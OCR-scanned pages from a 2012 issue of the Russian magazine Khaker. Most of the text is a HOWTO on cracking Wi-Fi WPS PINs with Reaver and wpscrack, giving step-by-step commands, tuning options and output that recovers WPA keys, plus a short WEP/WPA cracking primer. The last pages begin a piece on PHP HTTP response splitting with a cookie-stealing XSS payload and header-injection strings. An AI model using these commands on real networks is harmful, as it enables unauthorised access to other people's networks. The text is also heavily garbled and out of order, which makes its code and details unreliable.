дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, где его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые периодически обходя т контент

таких хостингов и публикуют интересные К примеру, исследователь Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, что в Сети даже есть целые ресур­

ссылки с соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но даже этого вполне достаточно, чтобы

Скрипт позволяет изящно обходить записи

чески п убликует записи вроде

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

1ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости ради стоит сказать , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

что качают чаще всего?

в последнее время апдейты прекратились. ::х:

017


COVERSTORY •

rlal Nc.

01С10С11100003

Туре

11111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код уже потен ц иально п одвержен ата­

to il Nttwork

ке типа bгutefoгce. Н о это лишь цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 11111 1111111 ( ;;, 0484-0~

Как я уже заметил ранее, РIN-код состоит

Е] Hidt с lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

из восьми цифр - следовательно, существует Ьу p щl1rr1g

10л81100

tl1t

но сократить. Д ело в том, что после д няя цифра

="--"-.:==~ РI N - к од

Лоrо ти пWРS

Ри с ун о к

WPS

1. РIN-код WPS, написанный

ок

на корпусе раутера

000 000 1вариантов для подбора. Од ­

нако количество вариантов можно существен ­

Рисунок

2.

Окн о дл я в вод а Р IN-кода

~

РI N-кода представляет собой некую контроль ­ ную сумму, которая высчитывается на осно­

вании семи первых цифр. В итоге получаем

WPS

уже

1ол711 о 000 0001 вариантов. Н о и ЭТО еще

не все! Далее в н имательно смотрим на устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, к которым вообще

lхардварнуюl и на компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, что е г о специал ь но про­

не надо вводить ключ для подключения,

тем самым активируя процесс настройки.

ектировали, ч т обы оставить возможность для

становится все меньше и меньше. Кажется, что

Нам это неинтересно.

брутфорса. Оказывается, проверка РIN-кода

Ввод РIN-кода в веб-интерфейсе. Пользо­

осущес т вляется в два этапа. Он делится на две

нажимаетспециальную кнопку на раутере

скоро их можно будет занести в Красную книгу.

2.

Если раньше человек мог даже и не знать, что

ватель заходит через бgаузер в админи­

равные части, и каждая часть проверяется от­

беспроводную сеть можно закрыть ключом,

стративны й интерфейс раутера и вводит

дельно! Посмотрим на схему :

обезопасив себя от посторонних подключе­

там РIN-код из восьми цифр, написанный

1.

ний, то теперь ему все чаще подсказывают

на корпусе у стройства !рисунок

о такой возможности. Взять хотя бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

способ подходит скорее для перваначаль­

вайдеры для популярных моделей роутеров,

ной конфигурации роутера, поэтому мы его

чтобы упростить настройку. Нужно указать две

рассматриватьтоже не будем .

вещи- логин/па роль и ... ключ для защиты

11, после

Е сли после о т сылки сообщения М4 атакую­ щий получил в ответ

EAP-NACK, то он

может

быть уверен, что первая ч асть РIN-кода неправильная.

2.

Е сли же он по л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая часть

Ввод РIN-кода на компьютере пользовате­

РIN-ко д а не в ерна. П олучаем 1 0л411 О

беспроводной сети. Что еще более важно,

ля !рисунок 21 . При соединении с раутером

вариантов для первой полови н ы и 10лз 11

сами производи т ели оборудования стараются

можно открыть специальную сессию

сделать процесс настройки незамыслова т ым.

в рамках которой настроить роутер или

0001 для второй. В итоге имеем всего л ишь 11 000 вариа н то в для пол н о г о п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, если

Чтобы лучше понять, как это буд е т работать,

живают меха н изм

правильно ввести

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот это уже п ри­

0001

посмо т ри на схему .

С его помощью пользовател ь за считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии не нуж -

перебора. Она о г ра н и ч ена скорост ь ю обра ­

водную сеть, вообще не забивая себе голову

на никакая аутентификация. Это может

ботки рау т ером W РS - за п росов: о д ни то ч ки

тем, что «где-то еще нужно включить шифро ­

сделать любой желающий! Получается, что

досту п а будут в ыд а в а т ь резул ьт ат каждую

3.

Важный моме нт - возмож н ая ско р ость

вание и прописать WРА - ключ». Ввел в системе восьмизначный символьный

PIN,

который

написан на роу т ере, - и готово' И вот здесь

IEEE 802.11

держись крепче. В декабре сразу два иссле­

5upplicant--+ АР

Aut hent ication Requ es t

Э т о как

5upplicant - А Р

Authentication Response

черный ход для любого роутера. Оказалось,

5upplicant--+ АР

Association Request

5upplica nt - А Р

Association

дова т еля рассказали о серьезных фундамен­

тальных прорехах в протоко л е

WPS.

что если в точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен в большинстве

раутеров по умолчанию!, то подобрать PIN для подклю~ения и извлечь ключ для подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

автоматически за д ае т имя сети и шифрование.

Таким образом, п ользова т елю не т н еобходи­

802.11 Association

IEEE 802.11/ЕАР

ния мож.но за считанные часы! КАК РАБОТАЕТ

Respo пse

802.11 Authentication

5upplicant --+ АР

EAPO L·5tar t

5upplica nt - А Р

EAP-Req uest ldentity

5upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 802. 1 1/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости лезть в веб - интерфейс и разбираться

М1

En rollee ..... Re gist ra r

N1 11 Description 11 РКЕ

со сложными нас т ройками . А к уже настро­

М2

Enrollee- Regi strar

N1 11 N2l l Description 11 РК я 11 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 11 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 1 11 R-Hash 1 11 R-Ha sh2 11Eкevw,.oк.v(R-5 1) 11 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 11 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 2' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 11 Authent icator

proove posession of 2' half of PIN,

мв

Enrollee - Reg istrar

N1 11 Eкeywrapкey(Con figData) 11 Authenticator

send АР configuratio n set AP configuration

енной сети мож н о без п роблем добави т ь

любое устройство !например, ноу т букl: если правильно ввести

PIN,

то он полу ч ит все необ­

ходимые настройки. Это очень удобно, поэтому

все крупные игроки на рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры с по дд ерж­ кой

WPS.

Разберемся чуть по д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н о к З . Прото к ол аутентифи к аци и

Diffie·Heltman

Кеу

Exchange

proove posession of 15 ha lf of PIN proove posession of 1st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое время п ри этом затра ч ивается

<.. . > trying 18674095

нарасчетотк р ы т о г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, он д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д шаг ом МЗ. З атра че н ное на зто время мож н о у м е н ь шить , вы б р ав н а сторо н е клиента простой сек р ет н ый к л юч, который в д альнейurем упрос т и т р асчеты других

Wi- Fi

за

ч асо в

# f ound 2st half of

ключей . П рактика показы в ает, чтод л я ус п е шн о г о р езульт а т а обы чн о д ос т а т оч н о

Как видишь, сначала была nодоб р ана

п еребрать лиш ь п оло в ину всех вариантов,

первая nоловина РIN-кода, затем - в т орая,

и в среднем брутфорс занимает всего отче ­

и в конце концов программа выдала готовый

т ыр ех д о д еся т и часов.

к использованию ключ для подключения

к беспроводной сети. Сложно п ре д с т а в и т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

сколько времени потребовалось бы, чтобы

Первой появившейся реализацией брутфорса

подобрать ключ такой длины [61 символ)

стала утилита wpsc г ack

ранее существовавшими инструментами.

[goo.gl/9wABj l, на ­

писа нна я иссле д о в ателем Стефа н ом Фибё ­

В п р очем, wpscгack не единственная утилита

ком на я зыке

для эксплуа т ации уязвимости, и это довольно

Pytho n. Ут илита

исnользовала

библиотеку 5сару, п оз в оляю щ ую конструиро­

забавный момент: в то же само~ время над

вать п р оиз в ольн ы е сетевые пакеты. Сценарий

той же самой проблемой работал и другой

мож н о за п ус т ит ь т олько п о д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д в а ри т ельно nе р еве д я бес п роводной

Tactical

интерфейс в режим мониторинга. В качес т ве

появился работающий РоС для реализа-

параметров необхо д имо указа т ь имя сетевого

ции атаки, он опубликовал свою у т илиту

интерфейса в сис т еме , МАС - а др ес бес п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

во дн о г о адаn тер а , а т акже МАС - а др ес то ч ки

н е только автоматизирует процесс п о д бора

доступа и ее название

WP5 - PIN

[551 01.

N etwoгk

5olutions.

Инкремент~уем

2 часть PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, что в Сети

и извлекает Р5К - ключ, но и пред­

ла г ает большее количество настроек, чтобы

$ ./wpscrack .py --iface mon0 \

атаку можно было осуществить про т ив самых

--client 94:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 18660005 attempt too k 1.08 se conds try ing 18670004 # found 1st half of

раз н ых рау т е ров. К тому же о н а п о дд ержи в ает

Рисунок

4. Блок - с х ема

брутфорса РIN-кода

WPS

в одных ус т ройств. Поз т ому ис п ользовать мы будем именно его. Шаг О. Готовим систему

нам н ого большее количество беспроводных

На официальном сай т е B ackTгack

адаптеров. Мы решили взять ее за основу

ступен для загрузки в виде виртуал ь ной

и подробно описать, как злоумышленник

машины под VMwa г e и загрузочного образа

может использовать уязвимост ь в про т околе

150.

WP5 для

просто записат ь об р аз на болва н ку, а мож н о

подключения к за щ и щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й в ари а нт . Мож н о

с помощью программы

проводной сети.

5 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l с д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

так или ина ч е, за г рузив ш ис ь с т ако г о носи ­

К а к и для любой другой атаки на бес п ровод ­

теля, мы без л и ш них заморачек сразу буд ем

ную сеть, нам понадобится

иметь систему, готовую к работе.

Linux.

Ту т надо

PIN

сказать, что Reaveг присутствует в репазито­

attempt too k 1.09 se cond s t ry ing 18670011 att empt t ook 1.08 second s

ри и всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , в котором к тому же уже

Л огин и п араль дл я вхо д а по умо лча нию ­

в клю ч ены необходимые драйвера для беспро -

1. Вход

в систему

гооt:tоо г. О каз а вшись в консо л и, можно сме л о

старто в а ть иксы [ест ь отдель н ые с борки B ackTгack - как с

GNOME, т ак и с К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

2. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п о над об ит с я

1. WEP (Wiгed Equivalent Pгivacyl

брать ключ для за к рытой WPA/WPA2 сети [да

и н тер н ет. П оэ т ому п о д к л ю ч аем пат чко рд

Самая первая технология для защиты бес­

и то исключительно при наличии дампа так

или настраи в аем бес про во д ной а д а пт ер

проводной сети оказалась крайне слабой.

называемого

[Applications ~ l nte гn et 7 Wicd N e t wo г k

Взломать ее можн о буквально за несколько

ется в эфир при подключении клиента к точке

минут, используя слабости применяемого в ней

доступа) . Брутфорс может затянуться на дни,

ми н ала, гд е загружаем п ос л е днюю в е р си ю

шифра

месяцы и годы . Для увеличения эффективно­

у т или т ы ч ерез р е п озиторий :

RC4. Основными

инструментами здесь

WPA

Haпdshake, к оторый переда ­

служат снифер aiгodump-пg для сбора па кетов

сти перебора сначала использовались специа­

и утилита aiгcгack-ng, используемая непосред­

лизированные словари, потом были сгенери­

ственно для взлома ключа. Также существует

рованы радужные таблицы, позже появились

специальная тулза wesside-пg, которая вообще

утилиты, задействовавшие те х нологии

взламывает все близлежащие точки с

CUDA

WEP

и

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

5tгeam для аппаратного ускорения

Тут на д о сказат ь , ч т о в ре п ази т а р ии н а­ хо д и тся в е р сия

2. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс по словарю), cowpatty [с по м ощью раду ж ны х т а блиц) , pyгit

Перебор-это единственный способ подо-

[с исполь з ова н ие м в и део к артыl .

рекомен д уе т обновит ь ся до максимал ь но

в автоматическом режиме .

ХАКЕР

03 /158/ 2012

процессаза счет

Man age г l . Дал ее з ап ускаем эмулят о р тер ­

1.3,

ко т орая ли чн о у ме ня

зар а бо т а ла н е пр ави льн о. П оиска в ин ф о р м а ­ цию о проблеме, я на ш ел пост а вт ора, который

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые из

SVN.

Эта команда создает виртуальный интер­

Это, в общем, самый

фейс в режиме мониторинга, его название

у нивер са льный с n особ уст ановки ( для любого

будет указано в выводе команды (обычно это monOI . Теnерь нам надо найти точку достуnа

дистриб утива !.

для а та ки и узнать её

BSSID . Восnользуемся

у ти литой для nрослушки бес n ро в о дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

6. Reaver Pro- железка от создателей Reaver

в радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не будет - nроверено лично . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, установка

с шифрованием

# reaver -i mon0

по ключу

WPA/WPA2 и аутентификацией PSK. Лучше выбирать одну из nер­

-vv

00:21:29:74:67:50

вых в сnиске, так как для nроведения атаки

Ключ

включает расширенный вывод

nроизводится и того nр о ще , благодаря нали­

желательна хорошая связь с точкой. Если точек

чию соотве т с тв ую щего

много и сnисок не умещается на экране, то мож­

nрограммы, чтобы мы могли убедиться, что все

но восnользоваться другой извест н ой утилитой

работает как надо .

PKGBUILD'a:

там интерфейс более nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

в этом nлане. Оnционально _можно на месте nро­ Шаг

3.

Подготовка к брутфорсу

верить, включен ли на нашей точке механизм

WPS. Для этого в комnлекте с Reaveг (но только если брать его из SVNI идет утилита wash :

Для исnользования Reaveг необходимо nро­ делать следующие вещи:

nеревести бесnрово дно й а даnте р в режим

# ./wash -i mon0

мониторинга;

узнать имя бесnроводно г о интерфейса;

• • •

узнать МАС-а дрес т очки д остуnа (BSS IDI; убедиться, что на т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного в режим мони­

WPS.

торинга. Также можно исnользовать оnцию

интерфейс вообще nрисутств уе т в системе:

наnример, тем же aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, все завелось

ли утилиту

хорошо, и остается туnо ж дать . Пр оцесс может

wash.

Будем надеяться, к моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, за которое

Шаг

nримерно nять часов. Как только он буд ет nо­

мне удалось сбрутфорсить

wlanOI- значит,

4. Запускаем

брутфорс

система расnознала адаnтер !если он nодклю­

Теnерь можно nристуnать неnосредственно

чалея к бесnрово дн ой сети, чтобы загрузить

к nеребору

nростом случае нужно немного. Необходимо

П ере в е д ем адаnтер в режим мониторинга:

лишь указать имя интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами ранее в режим мониторинга! и BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 2011, Tact1cal Network Solutions. Cra1g Heffner

1-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 15 -vv

Рисунок

00:21:29.74:67:50

1

022

5. Пример работы

WPA-PSK,

который сразу же можно ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 64637129 Кеу cracked 1n 2 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

1

ключ

Защититься от атаки можно nо ка о дн им

б

l1nksys --p1n 64637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 2011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 64637129 [+] Кеу cracked in 13654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

что даже не укладывается в голове.

·с

добран, nрограмма радостно об этом сообщит:

nользовать для nодключения. В се та к nросто,

[-] т~-y1r1g р111 61889978 [' 1 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, конечно же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 1ESSID: 11nksys) !·1 Trv1ng p1n 63979978

reaver -1

PIN,

PIN'a. Для старта Reaveг в самом

Reaveг, то лучше обо рвать nод ключение!.

~onO

Если nрограмма n ос лед о вательн о отnрав­

nричине в nакет Reaveг в BackTгack не включи ­

Е сли в выводе э той команды есть интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 2011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 63979978

'-f' и скормить утилите сар-файл, созданный,

Для начала nроверим, что бесnроводной

фейс с оnисанием (обычно это

"-vv"

WPS

в настрой­

ках роутера. Правда , как оказалось, с д е лат ь э т о возможно дале ко не всегда . П оско л ьку уязвимость су щ ествуе т не на уровне реализа­ ции , а на уров не nротокола, ждать от nроиз­

водителей скоро г о nатча, ко торый решил бы все nроблемы, не стоит. Самое большее, что они могут сейчас с д елать, - это максима льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

на один час nосле nяти

неудачных nоnыток ввода РIN- ко да , то nеребор займет уже около

90 дней.

Но другой в оnрос,

насколько быстро можно накатить такой патч

на миллионы устройст в , ко т орые работают брутфорса

Reaver

по всему миру? :х:

ХАКЕР

03/158/201 2


HOWTO:

Взломать

Wi-Fi

за

10

часов

FAQ r;t

a.l

n

Какой беспроводной адаптер нужен

был поврежден по пути. д вот для атаки

литы

для взлома?

на

находится в списке .

WP5

необходимо строгое следование

wash:

запусти её и проверь, что твоя цель

Перед тем как экспериментировать,

протоколу передачи па кетов между точкой

Почему я не могу ассоциироваться

нужно убедиться, что беспроводной

доступа и Reaveг для проверки каждого

с точкой доступа?

адаптер может работать в режиме монито­

РIN-кода . Если при этом какой-то пакет

Это может быть из-за плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет в непотребном

ском поддерживаемого оборудования

виде , то придется заново устанавливать

18.1

сигнала или потому, что твой адаптер непригоден для подобных изысканий.

на сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки на

adapteг list l. Если же встанет вопрос о том,

гораздо более зависимыми от уровня

какой беспроводной модуль купить, то

сигнала. Важно помнить, что если твой

начать можно с любого адаптера на чипсете

беспроводной адаптер видит точку доступа ,

RTL8187L . U5В'шные донглы легко найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

то это ещё не значит, что и точка доступа

181

доступа заблокировала WP5 . Обычно

видит тебя . Так что если ты являешься

это временная блокировка (около пяти минут!, но в некоторых случаях могут влепить и перманентный ба н (разблокировка

n

счастливым обладателем высокомощного

1':'1 ~

n

Почему у меня возникают ошибки

адаптера от

"timeout"

на пару десятк��в

и "out of огdег"?

Обычно это происходит из-за низкого

уровня сигнала и плохой связи с точкой

18.1

доступа. Кроме того, точка доступа может

Netwoгk и антенl!ы

ALFA

dBi , то

только через административную панельl .

не надейся , что

получится поломать все пойманные точки

Есть один неприятный ба г в Reaveг версии

доступа .

1.3,

из-за которого не определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня не работает спуфинг

унда предлагают использовать опцию

a.l

МАС-адреса?

· --ignoгe-locks' или скачать последнюю

Почему при плохом сигнале Reaveг

...

Возможно, ты спуфишь МАС виртуально-

версию из

работает плохо, хотя тот же взлом WEP

181

го интерфейса mопО, а это работать

WP5.

проходит нормально?

не будет. Надо указывать имя реального

n обычно взлом

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

181

Это происходит потому, что точка

r;t

на время заблокировать использование

1':'1 a.l

Почему я постоянно получаю ошибки

a.l

5VN.

mМожно ли одновременно запустить два и более экземпляров Reaveг для ускорения

атаки?

n

Теоретически МОЖНО, НО если ОНИ будут

па кетов, чтобы получить больше векторов

Reaveг все время посылает точке доступа

инициализации (IVI, необходимых для

один и тот же

успешного взлома . В этом случае неважно,

Проверь, активирован ли на раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо как-то

WP5. Это

в данном случае она ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

можно сделать при помощи ути-

долбить одну и ту же точку доступа, то

REAVER

мы показали самый простой и наиболее универсальный

HOWTO

181

в чем дело?

способ использования утилиты Reaveг. Однако реализация

WP5 у

разных

5. Некоторые точки доступа

могут блокировать

WPS на

определенное

время , заподозрив, что их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, поэтому в некоторы х случаях необходима

и делает паузу в переборе на

дополнительная настройка. Ниже я приведу дополнительные опции,

паузы можно менять:

315

секунд по умолчанию, длительность этой

которые могут повысить скорость и эффективность перебора ключа.

# reaver -i

1. Можно задать номер

канала и

# reaver -i

00 : 01:02:03:04:05

6. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

5510 точки доступа: -с

11

-е liпksys

Некоторые реализации протокола

WPS

разрывают соединение при

неправильном РIN-коде, хотя по спецификации должны возвращать особое сообщение . Reaveг автоматически распознает такую ситуацию, для этого

2.

Благотворно сказывается на скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое значение секретного ключа, тем самым облегчая

# reaver -i

расчеты на стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

7. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена для работы с теми АР, которые

требуют завершения WРS-сессии с помощью сообщения ЕАР

3. Таймаут ожидания

необходимости его можно изменить:

# reaver -i

# reaver -i

8. Возникновение

mопВ

FAIL:

ответа по умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 2

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок в WР5-сессии может означать, что АР

ограничивает число попыток ввода РIN-кода, либо просто перегружена

4. Задержка

между попытками по умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 20 12

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

причем время паузы может быть задано с помощью опции

т акже может быть настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023


COVERSTORY &lt;script&gt;alert(&quot;Recognize-Security &quot; +document .cookie ); &lt;/script&gt;&lt; !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, в п роцессе аудита исходно г о кода веб-приложений

на РНР часто попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) или даже header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую еще можно классифициро­

ZeгoNights, а лишь написана по его мотивам. Помимо материала,

вать хотя бы как уяз вимость класса О реп R ediгect, то вторая вроде

дальнейших исследований, посвященных филырации РНР­

бы вообще не является уязвимостью . Опытный читатель заметит,

функций и механизмам работы браузеров с

чт о здесь в явном виде как раз таки и присутствует ба г типа НТТР

доклада, касающаяся уязви мастей, связанных с заражением

Response Sp li tti ng, %0 d%0a

изложенного во время доклада, в статью также вошло оnисание .

cookies. Часть

кеш а, и smuggling-aтaк, будет изложена в расширенном виде

н о всё дело в том, ч т о современные версии

интерпретатора РНР [начиная с 2006-го года] фильтруют раздели­ тели

Эта статья не является копией моего доклада на конференции

в следующих выпусках журнала.

и препятствуют проведению атаки. Вот это и есть та

самая практическая предпосылка, которая заставила меня начать

углубленное изучение данной темы. Поэтом у предлагаю не верить

сии РНР

первому впечатлению о фильтрации в функции headeг[] и разо­

которая предотвращает внедрение заголовков и защищает от атак

браться с проблемой глубже, ведь, быть может, т акую фильтрацию

типа «расщепление ответа>>. Таким образом, начиная с в ерсии РНР

4.4.2

можно обойти.

и

4.4.2

5.1.2,

и

5.1.2

в этой функции осуществляется фильтрация,

приведенный ниже код н е является уязвимым для атак

типа <<в недр ение заголовков>> и <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся к переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут служить разделителями заголов­

ков НТТР- ответа. П олный текст спецификации доступен по адресу

Ьit .l y/ г9pLL , нас же интересует раздел

6 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая структура НТТР- ответа имеет следующий вид :

В результате попытки проведения таких атак будет вызвана ошибка типа Waгniпg, примерно такая:

RFC-2616 Response = Status-Line; Section 6.1 * (( general-header; Section 4.5 1 response-header; Section 6.2 1 entity-header ) CRLF); Section 7.1 CRLF [ message-body ]; Section 7.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 2 Н о давай не будем сразу навешивать ярлыки, а разберемся в проблеме чуть глубже. Рассмотрим код интерпретатора, который

Из приведенной выше информации ясно, что разделителем заголо вк ов является последовательность

CRLF,

пользуется для о тд еления тела отве т а о т блока заголовков . В кодированном виде

CR LF

выглядит как

выполняет фильтрацию разделителя :

которая также ис­

%0 D%0A.

URL-

Именно в таком

виде она и используется для проведения классических атак типа

«рас щепление запроса». Эти методы хорошо работали до тех пор, пока интерпретаторы не обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s = header_line, * е = header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 1 ) == ' 11 *( р + 1 ) == '\t ' ) {

о ко т орых сейчас и пойдет речь.

5 =

р

+ 1;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци я headeг[] [ Ьit .l y/wVbbcd ] широко используется в РНР для

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков в НТТР -ответе сервера. Чаще всего ее при­

меняют для переадресации пользователей с одной страницы веб­ приложения на другую. Как видно из документации, начиная с в ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, здесь осуществляе т ся проверка на наличие символа

LF

[в URL-кодированном виде выглядит как % Од] . Пр и обнаруже­

нии такого символа, после которого стоит что-то кроме табуля-

ции

[%09]

и пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а только LF-байт. Согласно RFC , который мы

недавно изучили, всё работае т безопасно. Н о предл а гаю не сда­ ваться так быстро и узнать у браузеров, соблюдаю т ли они

RFC

в точности? П ервым делом можно проверить, как браузеры воспри­ нимают заголовок с первым пробелом и табуляцией. Для этого на­ пишем прос т ой РНР-скрипт и проверим его под в семи браузерам и :

Таблица тестирования браузеров на одиночный разделитель, двойной заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 2\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй и властвуй

